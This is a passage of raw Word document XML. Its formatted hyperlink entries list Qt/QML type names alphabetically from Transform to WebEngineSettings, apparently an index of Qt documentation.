                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Transform: Qt3D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07" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Transition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08" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Translate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09" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TreeView</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10" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TreeViewStyle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11" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Tumbler: QtQuickExtras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12" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Tumbler: QtQuickControls2</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13" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TumblerColumn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14" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>TumblerStyle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15" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Turbulence</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>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bookmarkStart w:id="1182" w:name="u"/>
            <w:bookmarkEnd w:id="1182"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>U</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16" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>UniformAnimator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17" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>url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18" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>User</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83" w:name="v"/>
            <w:bookmarkEnd w:id="1183"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>V</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19" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ValueAxis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20" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ValueAxis3D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21" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ValueAxis3DFormatter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22" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>var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23" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>variant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24" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>VBarModelMapper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25" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>VBoxPlotModelMapper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26" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>VCandlestickModelMapper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427" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>vector2d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428" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>vector3d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highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1429" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Vector3dAnimation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30" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>vector4d</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31" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Video</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32" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>VideoOutput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33" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Viewport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34" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ViewTransition</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35" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>VirtualKeyboardSettings</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36" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>VisualDataGroup</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37" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>VisualDataModel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38" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>VisualItemModel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39" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>VPieModelMapper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40" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>VXYModelMapper</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>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bookmarkStart w:id="1184" w:name="w"/>
            <w:bookmarkEnd w:id="1184"/>
            <w:r w:rsidRPr="000821BB">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>W</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41" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Wander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42" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WaylandClient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43" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WaylandCompositor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44" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WaylandOutput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45" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WaylandQuickItem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46" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WaylandSurface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47" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WaylandView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48" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebChannel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49" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebEngine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50" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebEngineCertificateError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51" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebEngineDownloadItem</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52" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebEngineFullScreenRequest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53" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebEngineHistory</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54" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebEngineHistoryListModel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55" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebEngineLoadRequest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56" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebEngineNavigationRequest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57" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebEngineNewViewRequest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58" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebEngineProfile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59" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebEngineScript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60" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>WebEngineSettings</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61" w:history="1">
              <w:r w:rsidR="00B947D3" w:rsidRPr="000821BB">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Arial"/>
                  <w:color w:val="17A81A"/>
